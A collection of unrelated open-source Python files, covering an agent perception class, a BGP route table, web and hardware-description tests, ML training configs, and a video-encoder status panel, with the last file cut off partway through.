max_stars_repo_path | max_stars_repo_name | max_stars_count | id | content
---|---|---|---|---|
examples_and_tutorials/grid/heuristic_perception.py | ali-senguel/fairo | 669 | 12685874 | from droidlet.memory.memory_nodes import PlayerNode
class HeuristicPerception:
def __init__(self, agent):
self.agent = agent
def perceive(self):
bots = self.agent.world.get_bots()
for bot in bots:
# print(f"[Perception INFO]: Perceived bot [{bot.name}] in the world, update in memory]")
bot_node = self.agent.memory.get_player_by_eid(bot.entityId)
if bot_node is None:
memid = PlayerNode.create(self.agent.memory, bot)
bot_node = PlayerNode(self.agent.memory, memid)
self.agent.memory.tag(memid, "bot")
bot_node.update(self.agent.memory, bot, bot_node.memid)
print(
f"[Memory INFO]: update bot [{bot.name}] position: ({bot.pos.x}, {bot.pos.y}, {bot.pos.z})"
)
bot_memids = self.agent.memory.get_memids_by_tag("bot")
bots_in_world = [b.entityId for b in bots]
for memid in bot_memids:
bot_eid = self.agent.memory.get_mem_by_id(memid).eid
if bot_eid not in bots_in_world:
self.agent.memory.forget(memid)
print(f"[Memory INFO]: delete bot [{bot_eid}] from memory")
|
ryu/services/protocols/bgp/info_base/rtc.py | w180112/ryu | 975 | 12685879 | # Copyright (C) 2014 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Defines data types and models required specifically for RTC support.
"""
import logging
from ryu.lib.packet.bgp import RF_RTC_UC
from ryu.services.protocols.bgp.info_base.base import Destination
from ryu.services.protocols.bgp.info_base.base import NonVrfPathProcessingMixin
from ryu.services.protocols.bgp.info_base.base import Path
from ryu.services.protocols.bgp.info_base.base import Table
LOG = logging.getLogger('bgpspeaker.info_base.rtc')
class RtcTable(Table):
"""Global table to store RT membership information.
Uses `RtDest` to store destination information for each known RT NLRI path.
"""
ROUTE_FAMILY = RF_RTC_UC
def __init__(self, core_service, signal_bus):
Table.__init__(self, None, core_service, signal_bus)
def _table_key(self, rtc_nlri):
"""Return a key that will uniquely identify this RT NLRI inside
this table.
"""
return str(rtc_nlri.origin_as) + ':' + rtc_nlri.route_target
def _create_dest(self, nlri):
return RtcDest(self, nlri)
def __str__(self):
return 'RtcTable(scope_id: %s, rf: %s)' % (self.scope_id,
self.route_family)
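# Note: _table_key() above keys each destination as "<origin_as>:<route_target>",
# e.g. origin AS 65000 announcing route target "65000:100" would be stored under
# "65000:65000:100" (illustrative values).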
class RtcDest(Destination, NonVrfPathProcessingMixin):
ROUTE_FAMILY = RF_RTC_UC
def _new_best_path(self, new_best_path):
NonVrfPathProcessingMixin._new_best_path(self, new_best_path)
def _best_path_lost(self):
NonVrfPathProcessingMixin._best_path_lost(self)
class RtcPath(Path):
ROUTE_FAMILY = RF_RTC_UC
def __init__(self, source, nlri, src_ver_num, pattrs=None,
nexthop='0.0.0.0', is_withdraw=False,
med_set_by_target_neighbor=False):
Path.__init__(self, source, nlri, src_ver_num, pattrs, nexthop,
is_withdraw, med_set_by_target_neighbor)
|
txweb2/dav/test/test_options.py | backwardn/ccs-calendarserver | 462 | 12685886 | ##
# Copyright (c) 2005-2017 Apple Inc. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# DRI: <NAME>, <EMAIL>
##
from txweb2.iweb import IResponse
import txweb2.dav.test.util
from txweb2.test.test_server import SimpleRequest
class OPTIONS(txweb2.dav.test.util.TestCase):
"""
OPTIONS request
"""
def test_DAV1(self):
"""
DAV level 1
"""
return self._test_level("1")
def test_DAV2(self):
"""
DAV level 2
"""
return self._test_level("2")
test_DAV2.todo = "DAV level 2 unimplemented"
def test_ACL(self):
"""
DAV ACL
"""
return self._test_level("access-control")
def _test_level(self, level):
def doTest(response):
response = IResponse(response)
dav = response.headers.getHeader("dav")
if not dav:
self.fail("no DAV header: %s" % (response.headers,))
self.assertIn(level, dav, "no DAV level %s header" % (level,))
return response
return self.send(SimpleRequest(self.site, "OPTIONS", "/"), doTest)
|
DQMOffline/CalibCalo/python/MonitorAlCaEcalPhisym_cfi.py | ckamtsikis/cmssw | 852 | 12685890 | # The following comments couldn't be translated into the new config version:
# prescale
import FWCore.ParameterSet.Config as cms
#
#
# \author <NAME>
#
EcalPhiSymMonDQM = cms.EDAnalyzer("HLTAlCaMonEcalPhiSym",
# product to monitor
AlCaStreamEBTag = cms.untracked.InputTag("hltAlCaPhiSymStream","phiSymEcalRecHitsEB"),
SaveToFile = cms.untracked.bool(False),
FileName = cms.untracked.string('MonitorAlCaEcalPhiSym.root'),
AlCaStreamEETag = cms.untracked.InputTag("hltAlCaPhiSymStream","phiSymEcalRecHitsEE"),
prescaleFactor = cms.untracked.int32(1),
# DQM folder to write to
FolderName = cms.untracked.string('AlCaReco/EcalPhiSym')
)
|
usr/callbacks/next/next.py | uwitec/LEHome | 151 | 12685915 |
#!/usr/bin/env python
# encoding: utf-8
from lib.model import Callback
class next_callback(Callback.Callback):
def callback(self, action = None, target = None,
msg = None, state = None,
pre_value = None, pass_value = None):
DEBUG("* next callback: action: %s, target: %s, message: %s state: %s pre_value: %s pass_value %s" %(action, target, msg, state, pre_value, pass_value))
return True, "pass"
|
contents/convolutions/2d/code/python/2d_convolution.py | alzawad26/algorithm-archive | 1,975 | 12685963 |
import numpy as np
from contextlib import suppress
def convolve_linear(signal, filter, output_size):
out = np.zeros(output_size)
sum = 0
for i in range(output_size[0]):
for j in range(output_size[1]):
for k in range(max(0, i-filter.shape[0]), i+1):
for l in range(max(0, j-filter.shape[1]), j+1):
with suppress(IndexError):
sum += signal[k, l] * filter[i-k, j-l]
out[i, j] = sum
sum = 0
return out
def create_gaussian_kernel(kernel_size):
kernel = np.zeros((kernel_size, kernel_size))
# The center must be offset by 0.5 to find the correct index
center = kernel_size*0.5 + 0.5
sigma = np.sqrt(0.1*kernel_size)
def kernel_function(x, y):
return np.exp(-((x-center+1)**2 + (y-center+1)**2)/(2*sigma**2))
kernel = np.fromfunction(kernel_function, (kernel_size, kernel_size))
return kernel / np.linalg.norm(kernel)
def create_sobel_operators():
Sx = np.dot([[1.0], [2.0], [1.0]], [[-1.0, 0.0, 1.0]]) / 9
Sy = np.dot([[-1.0], [0.0], [1.0]], [[1.0, 2.0, 1.0]]) / 9
return Sx, Sy
def sum_matrix_dimensions(mat1, mat2):
return (mat1.shape[0] + mat2.shape[0],
mat1.shape[1] + mat2.shape[1])
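# Note: passing sum_matrix_dimensions(x, y) as output_size to convolve_linear()
# yields the "full" convolution, e.g. two (100, 100) arrays give a (200, 200)
# output, while passing x.shape keeps the output the same size as the signal.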
def compute_sobel(signal):
Sx, Sy = create_sobel_operators()
Gx = convolve_linear(signal, Sx, sum_matrix_dimensions(signal, Sx))
Gy = convolve_linear(signal, Sy, sum_matrix_dimensions(signal, Sy))
return np.sqrt(np.power(Gx, 2) + np.power(Gy, 2))
def create_circle(image_resolution, grid_extents, radius):
out = np.zeros((image_resolution, image_resolution))
for i in range(image_resolution):
x_position = ((i * grid_extents / image_resolution)
- 0.5 * grid_extents)
for j in range(image_resolution):
y_position = ((j * grid_extents / image_resolution)
- 0.5 * grid_extents)
if x_position ** 2 + y_position ** 2 <= radius ** 2:
out[i, j] = 1.0
return out
def main():
# Random distribution in x
x = np.random.rand(100, 100)
# Gaussian signals
def create_gaussian_signals(i, j):
return np.exp(-(((i-50)/100) ** 2 +
((j-50)/100) ** 2) / .01)
y = np.fromfunction(create_gaussian_signals, (100, 100))
# Normalization is not strictly necessary, but good practice
x /= np.linalg.norm(x)
y /= np.linalg.norm(y)
# full convolution, output will be the size of x + y
full_linear_output = convolve_linear(x, y, sum_matrix_dimensions(x, y))
# simple boundaries
simple_linear_output = convolve_linear(x, y, x.shape)
np.savetxt("full_linear.dat", full_linear_output)
np.savetxt("simple_linear.dat", simple_linear_output)
# creating simple circle and 2 different Gaussian kernels
circle = create_circle(50, 2, 0.5)
circle = circle / np.linalg.norm(circle)
small_kernel = create_gaussian_kernel(3)
large_kernel = create_gaussian_kernel(25)
small_kernel_output = convolve_linear(circle, small_kernel,
sum_matrix_dimensions(circle,
small_kernel))
large_kernel_output = convolve_linear(circle, large_kernel,
sum_matrix_dimensions(circle,
large_kernel))
np.savetxt("small_kernel.dat", small_kernel_output)
np.savetxt("large_kernel.dat", large_kernel_output)
circle = create_circle(50, 2, 0.5)
# Normalization
circle = circle / np.linalg.norm(circle)
# using the circle for sobel operations as well
sobel_output = compute_sobel(circle)
np.savetxt("sobel_output.dat", sobel_output)
|
configs/seg/_base_/schedules/schedule_adamw_80k.py | yinchimaoliang/K-Net | 361 | 12685979 | # optimizer
optimizer = dict(type='AdamW', lr=0.0001, weight_decay=0.0005)
optimizer_config = dict(grad_clip=dict(max_norm=1, norm_type=2))
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=1000,
warmup_ratio=0.001,
step=[60000, 72000],
by_epoch=False)
# runtime settings
runner = dict(type='IterBasedRunner', max_iters=80000)
checkpoint_config = dict(by_epoch=False, interval=8000)
evaluation = dict(interval=8000, metric='mIoU')
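# Net effect (assuming mmcv's default step gamma of 0.1): the lr warms up
# linearly to 1e-4 over the first 1000 iters, drops to 1e-5 at iter 60000 and
# 1e-6 at iter 72000, with checkpointing and mIoU evaluation every 8000 iters.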
|
examples/YOLOv3_Training.py | KerasKorea/YOLK_ObjectDetector | 124 | 12685990 | from keras.optimizers import Adam
from keras_yolov3.train import get_anchors, get_classes, data_generator_wrapper
from keras_yolov3.yolov3_class import YOLOv3
import tensorflow as tf
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
sess = tf.Session(config=config)
classes_path = '../keras_yolov3/model_data/coco_classes.txt'
anchors_path = '../keras_yolov3/model_data/yolo_anchors.txt'
class_names = get_classes(classes_path)
num_classes = len(class_names)
anchors = get_anchors(anchors_path)
num_anchors = len(anchors)
yolov3 = YOLOv3(anchors, num_classes)
model_path = '../keras_yolov3/model_data/yolo_weights.h5'
yolov3.model.load_weights(model_path, by_name=True, skip_mismatch=True)
annotation_path = '../keras_yolov3/model_data/train.txt'
with open(annotation_path) as f:
lines = f.readlines()
num_train = len(lines)
batch_size = 32
yolov3.model.compile(optimizer=Adam(lr=1e-3), loss={'yolo_loss': lambda y_true, y_pred: y_pred})
yolov3.model.fit_generator(data_generator_wrapper(lines, batch_size, yolov3.input_shape, anchors, num_classes),
steps_per_epoch=max(1, num_train // batch_size),
epochs=50,
initial_epoch=0)
|
tests/test_smart/test_smart_bits.py | leonardt/magma | 167 | 12686036 |
from functools import wraps, partial
import operator
import pytest
import magma as m
from magma.smart import SmartBit, SmartBits, concat, signed, make_smart
from magma.testing import check_files_equal
def _run_test(func=None, *, skip_check=False):
if func is None:
return partial(_run_test, skip_check=skip_check)
@wraps(func)
def _wrapper(*args, **kwargs):
name = func.__name__
ckt = func(*args, **kwargs)
m.compile(f"build/{name}", ckt, output="coreir-verilog", inline=True)
build = f"build/{name}.v"
gold = f"gold/{name}.v"
if not skip_check:
assert check_files_equal(__file__, build, gold)
return _wrapper
@_run_test
def test_binop():
# Ops can be add, sub, mul, div, mod, and, or, xor.
op = operator.add
class _Test(m.Circuit):
io = m.IO(
I0=m.In(SmartBits[8]),
I1=m.In(SmartBits[12]),
O1=m.Out(SmartBits[8]),
O2=m.Out(SmartBits[12]),
O3=m.Out(SmartBits[16]))
val = op(io.I0, io.I1)
io.O1 @= val
io.O2 @= val
io.O3 @= val
return _Test
@_run_test
def test_comparison():
# Ops can be eq, ne, ge, gt, le, lt.
op = operator.eq
class _Test(m.Circuit):
io = m.IO(
I0=m.In(SmartBits[8]),
I1=m.In(SmartBits[12]),
O1=m.Out(SmartBits[1]),
O2=m.Out(SmartBits[16]))
val = op(io.I0, io.I1)
io.O1 @= val
io.O2 @= val
return _Test
@_run_test
def test_lshift():
class _Test(m.Circuit):
io = m.IO(
I0=m.In(SmartBits[8]),
I1=m.In(SmartBits[4]),
O1=m.Out(SmartBits[8]),
O2=m.Out(SmartBits[16]))
val = io.I0 << io.I1
io.O1 @= val
io.O2 @= val
return _Test
@_run_test
def test_rshift():
class _Test(m.Circuit):
io = m.IO(
I0=m.In(SmartBits[8]),
I1=m.In(SmartBits[4]),
O1=m.Out(SmartBits[4]),
O2=m.Out(SmartBits[8]),
O3=m.Out(SmartBits[16]))
val = io.I0 >> io.I1
io.O1 @= val
io.O2 @= val
io.O3 @= val
return _Test
@_run_test
def test_concat():
class _Test(m.Circuit):
io = m.IO(
I0=m.In(SmartBits[8]),
I1=m.In(SmartBits[4]),
I2=m.In(SmartBits[10]),
O1=m.Out(SmartBits[4]),
O2=m.Out(SmartBits[16]))
val = concat(io.I0 + io.I1, io.I2)
io.O1 @= val
io.O2 @= val
return _Test
@_run_test
def test_unary():
# Ops can be invert, neg.
op = operator.invert
class _Test(m.Circuit):
io = m.IO(
I0=m.In(SmartBits[8]),
O1=m.Out(SmartBits[4]),
O2=m.Out(SmartBits[16]))
val = op(io.I0)
io.O1 @= val
io.O2 @= val
return _Test
@_run_test
def test_reduction():
# Ops can be and, or, xor.
op = operator.and_
class _Test(m.Circuit):
io = m.IO(
I0=m.In(SmartBits[8]),
O1=m.Out(SmartBits[1]),
O2=m.Out(SmartBits[16]))
val = io.I0.reduce(op)
io.O1 @= val
io.O2 @= val
return _Test
@_run_test
def test_smoke():
# NOTE(rsetaluri): We use a CircuitBuilder here just so we can dynamically
# add ports to make the test specification easier. The test just creates a
# bunch of SmartBits values and does operations and wires them. This is
# easiest to do and check in the context of a circuit definition. It is also
# (mostly) possible to do them on anonymous values but is less convenient.
class _Test(m.CircuitBuilder):
def __init__(self, name):
super().__init__(name)
self._counter = 0
def fresh_name(self):
name = f"port{self._counter}"
self._counter += 1
return name
def make_ports(self, *widths):
assert len(widths) >= 2
names = []
for i, width in enumerate(widths):
name = self.fresh_name()
width = widths[i]
T = SmartBit if width is None else SmartBits[width]
dir_ = m.Out if i == 0 else m.In
self._add_port(name, dir_(T))
names.append(name)
return [self._port(name) for name in names]
@m.builder_method
def _finalize(self):
# Any Smart<x> can be wired to any Smart<y>.
x, y = self.make_ports(10, 16)
x @= y # truncate y
y, x = self.make_ports(16, 10)
y @= x # extend x
x, z = self.make_ports(10, None)
x @= z # extend z
z, x = self.make_ports(None, 10)
z @= x # truncate x
# Any Smart<x> (op) Smart<y> is valid; each (op) has its own width
# rules.
# Arithmetic and logic.
out, x, y = self.make_ports(12, 10, 16)
out @= x + y # width = max(12, 10, 16); op: +, -, *, /, %, &, |, ^
out, x, z = self.make_ports(None, 10, None)
out @= x + z # width = max(1, 10, 1)
out, x = self.make_ports(16, 10)
out @= ~x # width = max(16, 10); ~
# Comparison.
out, x, y = self.make_ports(12, 10, 16)
out @= x <= y # width = 1; op: ==, !=, <, <=, >, >=
# Reduction.
out, x = self.make_ports(4, 10)
out @= x.reduce(operator.and_) # width = 1; op: &, |, ^
# Shifting.
out, x, y = self.make_ports(10, 10, 16)
out @= x << y # extend x, truncate output; width = 10; op: <<, >>
out, x, y = self.make_ports(16, 10, 16)
out @= y << x # extend x; width = 16
out, x, z = self.make_ports(10, 10, None)
out @= x << z # extend z; width = 10
out, x, z = self.make_ports(None, 10, None)
out @= z << x # extend z, truncate output; width = 1
# Concat.
out, x, y, z = self.make_ports(32, 10, 16, None)
out @= concat(x, y, z) # extend concat; width = 10 + 16 + 1 = 27.
class _TestTop(m.Circuit):
inst = _Test(name="Test")
return type(_TestTop.instances[0])
@_run_test
def test_complex():
class _Test(m.Circuit):
io = m.IO(
I0=m.In(SmartBits[7]),
I1=m.In(SmartBits[9, True]),
I2=m.In(SmartBits[12, True]),
O=m.Out(SmartBits[10]),
O2=m.Out(SmartBits[7]),
O3=m.Out(SmartBit),
)
x = (~(io.I0 + io.I1) + io.I2) << io.I0.reduce(operator.and_)
y = signed(io.I1 <= io.I2) + signed(io.I0)
io.O @= x
io.O2 @= y
io.O3 @= io.I0
EXPECTED = ("lshift(add(invert(add(Extend[width=5, "
"signed=False](SmartBits[7, False](I0)), Extend[width=3, "
"signed=False](SmartBits[9, True](I1)))), SmartBits[12, "
"True](I2)), Extend[width=11, "
"signed=False](AndReduce(SmartBits[7, False](I0))))")
assert str(_Test.io.O._smart_expr_) == EXPECTED
return _Test
def test_type_constructors():
T1 = SmartBits[8]
assert T1._T is m.Bits[8]
assert T1._signed == False
T2 = SmartBits[12, True]
assert T2._T is m.Bits[12]
assert T2._signed == True
with pytest.raises(TypeError) as pytest_e:
T3 = SmartBits[8][12]
assert False
args = pytest_e.value.args
assert args == ("Can not doubly qualify SmartBits, i.e. "
"SmartBits[n][m] not allowed",)
@_run_test(skip_check=True)
def test_unsigned_add():
class _Test(m.Circuit):
io = m.IO(
x=m.In(SmartBits[8, True]),
y=m.In(SmartBits[16, False]),
O=m.Out(SmartBits[20, True])
)
io.O @= io.x + io.y
return _Test
def test_make_smart():
class _T(m.Product):
x = m.Bits[8]
y = m.Array[10, m.Bits[16]]
# Value should be non-anonymous so that the value checks below work.
value = _T(name="value")
smart = make_smart(value)
# Type checks.
assert isinstance(smart, m.Tuple)
assert set(type(smart).field_dict.keys()) == {"x", "y"}
assert isinstance(smart.x, SmartBits)
assert len(smart.x) == 8 and type(smart.x)._signed == False
assert isinstance(smart.y, m.Array)
assert isinstance(smart.y[0], SmartBits)
assert len(smart.y[0]) == 16
assert type(smart.y[0])._signed == False
# Value checks.
assert smart.x._get_magma_value_().value() is value.x
for i in range(10):
assert smart.y[i]._get_magma_value_().value() is value.y[i]
|
fastflix/widgets/panels/status_panel.py | ObviousInRetrospect/FastFlix | 388 | 12686076 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import logging
import time
from datetime import timedelta
from typing import Optional
from PySide6 import QtCore, QtWidgets
from fastflix.exceptions import FlixError
from fastflix.language import t
from fastflix.models.fastflix_app import FastFlixApp
from fastflix.models.video import Video
from fastflix.shared import time_to_number, timedelta_to_str
logger = logging.getLogger("fastflix")
class StatusPanel(QtWidgets.QWidget):
speed = QtCore.Signal(str)
bitrate = QtCore.Signal(str)
nvencc_signal = QtCore.Signal(str)
tick_signal = QtCore.Signal()
def __init__(self, parent, app: FastFlixApp):
super().__init__(parent)
self.app = app
self.main = parent.main
self.current_video: Optional[Video] = None
self.started_at = None
self.ticker_thread = ElapsedTimeTicker(self, self.tick_signal)
self.ticker_thread.start()
layout = QtWidgets.QGridLayout()
self.hide_nal = QtWidgets.QCheckBox(t("Hide NAL unit messages"))
self.hide_nal.setChecked(True)
self.eta_label = QtWidgets.QLabel(f"{t('Time Left')}: N/A")
self.eta_label.setToolTip(t("Estimated time left for current command"))
self.eta_label.setStyleSheet("QLabel{margin-right:50px}")
self.time_elapsed_label = QtWidgets.QLabel(f"{t('Time Elapsed')}: N/A")
self.time_elapsed_label.setStyleSheet("QLabel{margin-right:50px}")
self.size_label = QtWidgets.QLabel(f"{t('Size Estimate')}: N/A")
self.size_label.setToolTip(t("Estimated file size based on bitrate"))
h_box = QtWidgets.QHBoxLayout()
h_box.addWidget(QtWidgets.QLabel(t("Encoder Output")), alignment=QtCore.Qt.AlignLeft)
h_box.addStretch(1)
h_box.addWidget(self.eta_label)
h_box.addWidget(self.time_elapsed_label)
h_box.addWidget(self.size_label)
h_box.addStretch(1)
h_box.addWidget(self.hide_nal, alignment=QtCore.Qt.AlignRight)
layout.addLayout(h_box, 0, 0)
self.inner_widget = Logs(self, self.app, self.main, self.app.fastflix.log_queue)
layout.addWidget(self.inner_widget, 1, 0)
self.setLayout(layout)
self.speed.connect(self.update_speed)
self.bitrate.connect(self.update_bitrate)
self.nvencc_signal.connect(self.update_nvencc)
self.main.status_update_signal.connect(self.on_status_update)
self.tick_signal.connect(self.update_time_elapsed)
def cleanup(self):
self.inner_widget.log_updater.terminate()
self.ticker_thread.stop_signal.emit()
self.ticker_thread.terminate()
def get_movie_length(self):
if not self.current_video:
return 0
return (
self.current_video.video_settings.end_time or self.current_video.duration
) - self.current_video.video_settings.start_time
def update_speed(self, combined):
if not combined:
self.eta_label.setText(f"{t('Time Left')}: N/A")
return
try:
time_passed, speed = combined.split("|")
if speed == "N/A":
self.eta_label.setText(f"{t('Time Left')}: N/A")
return
time_passed = time_to_number(time_passed)
speed = float(speed)
if not speed:
return
assert speed > 0.0001, speed
length = self.get_movie_length()
if not length:
return
data = timedelta(seconds=(length - time_passed) // speed)
except Exception:
logger.exception("can't update size ETA")
self.eta_label.setText(f"{t('Time Left')}: N/A")
else:
if not speed:
self.eta_label.setText(f"{t('Time Left')}: N/A")
self.eta_label.setText(f"{t('Time Left')}: {timedelta_to_str(data)}")
def update_bitrate(self, bitrate):
if not bitrate or bitrate.strip() == "N/A":
self.size_label.setText(f"{t('Size Estimate')}: N/A")
return
try:
bitrate, _ = bitrate.split("k", 1)
bitrate = float(bitrate)
size_eta = (self.get_movie_length() * bitrate) / 8000
except AttributeError:
self.size_label.setText(f"{t('Size Estimate')}: N/A")
except Exception:
logger.exception(f"can't update bitrate: {bitrate} - length {self.get_movie_length()}")
self.size_label.setText(f"{t('Size Estimate')}: N/A")
else:
if not size_eta:
self.size_label.setText(f"{t('Size Estimate')}: N/A")
self.size_label.setText(f"{t('Size Estimate')}: {size_eta:.2f}MB")
def update_nvencc(self, raw_line):
"""
Example line:
[53.1%] 19/35 frames: 150.57 fps, 5010 kb/s, remain 0:01:55, GPU 10%, VE 96%, VD 42%, est out size 920.6MB
"""
for section in raw_line.split(","):
section = section.strip()
if section.startswith("remain"):
self.eta_label.setText(f"{t('Time Left')}: {section.rsplit(maxsplit=1)[1]}")
elif section.startswith("est out size"):
self.size_label.setText(f"{t('Size Estimate')}: {section.rsplit(maxsplit=1)[1]}")
def update_time_elapsed(self):
now = datetime.datetime.now(datetime.timezone.utc)
if not self.started_at:
logger.warning("Unable to update time elapsed because start time isn't set")
return
try:
time_elapsed = now - self.started_at
except Exception:
logger.exception("Unable to calculate elapsed time")
return
self.time_elapsed_label.setText(f"{t('Time Elapsed')}: {timedelta_to_str(time_elapsed)}")
def on_status_update(self):
# If there was a status change, we need to restart ticker no matter what
self.started_at = datetime.datetime.now(datetime.timezone.utc)
def close(self):
self.ticker_thread.terminate()
super().close()
class Logs(QtWidgets.QTextBrowser):
log_signal = QtCore.Signal(str)
clear_window = QtCore.Signal(str)
timer_signal = QtCore.Signal(str)
def __init__(self, parent, app: FastFlixApp, main, log_queue):
super(Logs, self).__init__(parent)
self.parent = parent
self.app = app
self.main = main
self.status_panel = parent
self.current_video = None
self.log_signal.connect(self.update_text)
self.clear_window.connect(self.blank)
self.timer_signal.connect(self.timer_update)
self.log_updater = LogUpdater(self, log_queue)
self.log_updater.start()
def update_text(self, msg):
if self.status_panel.hide_nal.isChecked() and msg.endswith(("NAL unit 62", "NAL unit 63")):
return
if self.status_panel.hide_nal.isChecked() and msg.lstrip().startswith("Last message repeated"):
return
if msg.startswith("frame="):
try:
output = []
for i in (x.strip().split() for x in msg.split("=")):
output.extend(i)
frame = dict(zip(output[0::2], output[1::2]))
self.status_panel.speed.emit(f"{frame.get('time', '')}|{frame.get('speed', '').rstrip('x')}")
self.status_panel.bitrate.emit(frame.get("bitrate", ""))
except Exception:
pass
elif "remain" in msg:
self.status_panel.nvencc_signal.emit(msg)
self.append(msg)
def blank(self, data):
_, video_uuid, command_uuid = data.split(":")
try:
self.parent.current_video = self.main.find_video(video_uuid)
self.current_command = self.main.find_command(self.parent.current_video, command_uuid)
except FlixError:
logger.error(f"Couldn't find video or command for UUID {video_uuid}:{command_uuid}")
self.parent.current_video = None
self.current_command = None
self.setText("")
self.parent.started_at = datetime.datetime.now(datetime.timezone.utc)
def timer_update(self, cmd):
self.parent.ticker_thread.state_signal.emit(cmd == "START")
def closeEvent(self, event):
self.hide()
class ElapsedTimeTicker(QtCore.QThread):
state_signal = QtCore.Signal(bool)
stop_signal = QtCore.Signal() # Clean exit of program
def __init__(self, parent, tick_signal):
super().__init__(parent)
self.parent = parent
self.tick_signal = tick_signal
self.send_tick_signal = False
self.stop_received = False
self.state_signal.connect(self.set_state)
self.stop_signal.connect(self.on_stop)
def __del__(self):
self.wait()
def run(self):
while not self.stop_received:
time.sleep(0.5)
if not self.send_tick_signal:
continue
self.tick_signal.emit()
logger.debug("Ticker thread stopped")
def set_state(self, state):
self.send_tick_signal = state
def on_stop(self):
self.stop_received = True
class LogUpdater(QtCore.QThread):
def __init__(self, parent, log_queue):
super().__init__(parent)
self.parent = parent
self.log_queue = log_queue
def __del__(self):
self.wait()
def run(self):
while True:
msg = self.log_queue.get()
if msg.startswith("CLEAR_WINDOW"):
self.parent.clear_window.emit(msg)
self.parent.timer_signal.emit("START")
elif msg == "STOP_TIMER":
self.parent.timer_signal.emit("STOP")
elif msg == "UPDATE_QUEUE":
self.parent.status_panel.main.video_options.update_queue(currently_encoding=self.parent.converting)
else:
self.parent.log_signal.emit(msg)
|
startup/GafferOSL/shaderNameCompatibility.py | ddesmond/gaffer | 561 | 12686096 |
##########################################################################
#
# Copyright (c) 2018, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of <NAME> nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import GafferOSL
__nameMapping = {
"Utility/VectorToColor" : "Conversion/VectorToColor",
"Utility/BuildColor" : "Conversion/FloatToColor",
"Utility/SplitColor" : "Conversion/ColorToFloat",
"Utility/BuildPoint" : "Conversion/FloatToVector",
"Utility/SplitPoint" : "Conversion/VectorToFloat",
"Maths/FloatMix" : "Maths/MixFloat",
"Maths/VectorMix" : "Maths/MixVector",
"Maths/FloatAdd" : "Maths/AddFloat",
"Maths/FloatMultiply" : "Maths/MultiplyFloat",
"Maths/VectorAdd" : "Maths/AddVector",
"Maths/VectorMultiply" : "Maths/ScaleVector",
# A whole bunch of MaterialX shaders were renamed from `mx_<op>_<type>`
# to `mx_<op>_<type>_<type>` here :
#
# https://github.com/AcademySoftwareFoundation/OpenShadingLanguage/pull/909.
#
# It seems likely that this was a mistake, given that the equivalent
# shaders in the MaterialX repo are just `mx_<op>_<type>`. But to
# keep old scenes loading we have to do the conversion. If in future we
# switch to the MaterialX implementation, we will just have to
# reverse the renaming here.
"MaterialX/mx_add_color" : "MaterialX/mx_add_color_color",
"MaterialX/mx_add_color2" : "MaterialX/mx_add_color2_color2",
"MaterialX/mx_add_color4" : "MaterialX/mx_add_color4_color4",
"MaterialX/mx_add_float" : "MaterialX/mx_add_float_float",
"MaterialX/mx_add_surfaceshader" : "MaterialX/mx_add_surfaceshader_surfaceshader",
"MaterialX/mx_add_vector" : "MaterialX/mx_add_vector_vector",
"MaterialX/mx_add_vector2" : "MaterialX/mx_add_vector2_vector2",
"MaterialX/mx_add_vector4" : "MaterialX/mx_add_vector4_vector4",
"MaterialX/mx_clamp_color" : "MaterialX/mx_clamp_color_color",
"MaterialX/mx_clamp_color2" : "MaterialX/mx_clamp_color2_color2",
"MaterialX/mx_clamp_color4" : "MaterialX/mx_clamp_color4_color4",
"MaterialX/mx_clamp_float" : "MaterialX/mx_clamp_float_float",
"MaterialX/mx_clamp_vector" : "MaterialX/mx_clamp_vector_vector",
